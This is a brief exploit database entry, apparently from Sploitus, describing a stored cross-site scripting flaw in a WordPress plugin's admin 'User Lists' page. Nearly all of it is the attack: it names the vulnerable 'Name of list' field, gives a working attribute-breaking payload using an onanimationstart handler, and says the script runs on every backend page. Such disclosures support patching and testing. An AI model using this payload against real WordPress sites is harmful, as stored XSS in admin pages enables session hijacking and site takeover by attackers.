## https://sploitus.com/exploit?id=WPEX-ID:3C03816B-E381-481C-B9F5-63D0C24FF329
Put the following payload in the "Name of list" field in the User Lists > Overview & tools page (/wp-admin/admin.php?page=ameta-admin-overview.php): " style=animation-name:rotation onanimationstart=alert(/XSS/)//
The XSS will be trigged in all backend pages